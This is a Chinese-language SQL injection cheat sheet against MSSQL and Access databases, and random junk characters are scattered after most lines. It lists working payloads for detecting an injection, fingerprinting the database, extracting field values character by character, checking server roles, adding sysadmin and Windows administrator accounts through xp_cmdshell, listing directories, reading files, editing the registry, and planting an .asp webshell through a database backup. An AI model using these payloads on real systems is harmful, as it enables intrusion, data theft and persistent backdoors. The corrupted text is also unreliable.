1.判断是否有注入;and 1=1 ;and 1=2 :tlE`BIp
2.初步判断是否是mssql ;and user>0 ) BlJ|M
u7(];
3.注入参数是字符'and [查询条件] and ''=' =f4<({9
x.G"D(
4.搜索时没过滤参数的'and [查询条件] and '%25'=' u
!.DnKu
ULTNhq
R*n
5.判断数据库系统 /.2u.G
e7's)C>/'
;and (select count(*) from sysobjects)>0 mssql eRVY.E<
|=,83,a
;and (select count(*) from msysobjects)>0 access #jgqkMOd,j
4[(?L{
Lv3XYZgW~
:B+Rg cqi
6.猜数据库 ;and (select Count(*) from [数据库名])>0 To^#
0
R%W@~o\p]
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 OT%V{hD
yI:r7=KO
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 vh{9'vd3el
%2zas(b9j
9.(1)猜字段的ascii值(access) (qj,GmcS
Dx0O'uwR
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 - &NQ\W
86#-q7aX
(2)猜字段的ascii值(mssql) ${@q?iol
/Bm#`?(ia
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 :F9q>
qdO[d|d
10.测试权限结构(mssql) 4y1>
zw<
4G[u
-3\7vpcdN
u'=(&><
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- TIETj~+
0 S2v"(_T
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >KKeV(Ur
DQMPAj.
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- OH0S2?,{>
7}A5u,.,ht
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- >eRZ+|k?N
[u7 vY@
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0s)cVYppe
-E}>h[;qZ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- CJv>/#$/F
/MhS=gVxM
;and 1=(select IS_MEMBER('db_owner'));-- #n=A)#'my
E*OG-r
5St`@
):^ '/e
11.添加mssql和系统的帐户 Oy:QkV9
Ri;=aZ5m
;exec master.dbo.sp_addlogin username;-- wKGogf[(%
;exec master.dbo.sp_password null,username,password;-- pXve02b1B
3IGCl w(
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Zd8drT'@#
qFrt^+@
;exec master.dbo.xp_cmdshell 'net user username password phr2X*Z/)Y
H_Iim[v#
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 1B6C<cL:sU
<{E;s)hD?
;exec master.dbo.xp_cmdshell 'net user username password /add';-- r }ZLf
kJI3`gS+
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Mm "Wk
P`p6J8}4
`0Yt1Z&
09G9nu ;&{
12.(1)遍历目录 y+?=E g
"Ys_ \
;create table dirs(paths varchar(100), id int) XpR.rq$]
VPWxHVf
;insert dirs exec master.dbo.xp_dirtree 'c:\' l8er$8S}
a_Z.J3
;and (select top 1 paths from dirs)>0 anK[P'Y
cT_uJbP+
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 3aEt>x
hN& yc
lr`?yn1D(
B{;11u
(2)遍历目录 P\,F1N_?r
A
*a{
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- uFGv%W
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;:AG2zE!
`x2fp6
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 o,g6JTh
$/NGNkl[
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 C]yvK}
kSLSxfR
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Pbc`LN/s|
$|>6z_3%
dK:l&R
enPzy:C
13.mssql中的存储过程 Coga-: 2vu
-;sJ25(
xp_regenumvalues 注册表根键, 子键 aw%>YrJ
bs:C1j\&
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 K{,
W_^
gcX5Q^`a=
xp_regread 根键,子键,键值名 TvQWdX=
p3V9ikyy
;exec xp_regread :jZ*,d%1={
X4Pm)N`
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 C*"Rd
9c"0~7v
xp_regwrite 根键,子键, 值名, 值类型, 值 cFRSd
}p=
~+nS)4(
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 EZ:I$X
$
1ak I
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 1joc<EI
|M[v493\
xp_regdeletevalue 根键,子键,值名 WpZy](,
@).WIs
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 JA}S{
y&n1 Nj]^
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 sL!;hKK
Nb#H@zm
ODM>Z8@W/
0|],d?-h
14.mssql的backup创建webshell >g5T;NgH9
C\;;9
use model P Xyyyir{
(1j(*
?2
create table cmd(str image); @/_XS4
hXV4$Dai
insert into cmd(str) values (''); vG'vgUo
&M!4]pow
backup database model to disk='c:\l.asp'; H j>L>6>
d_4n0Kh0
[VfLv.8w
*T.={>HE8
15.mssql内置函数 rg#qSrHp
8r7/IGFg
;and (select @@version)>0 获得Windows的版本号 |u?k-,uI9
jD&}}:Dj
;and user_name()='dbo' 判断当前系统的连接用户是不是sa k#l'ko/X
G:E+s(x
;and (select user_name())>0 爆当前系统的连接用户 @oe3i
"cnG/{($*
;and (select db_name())>0 得到当前连接的数据库 NTpz)R
#J%h!#3g
v:'P"uU;4
9`nP(~
16.简洁的webshell *X-~TC0
[
HB/
_O22
use model &%_y6}xIw
"Qiq/"h
create table cmd(str image); #C;#$|d
2:smt)f
insert into cmd(str) values (''); pl1EJ <
B`RW-14g
backup database model to disk='g:\wwwtest\l.asp';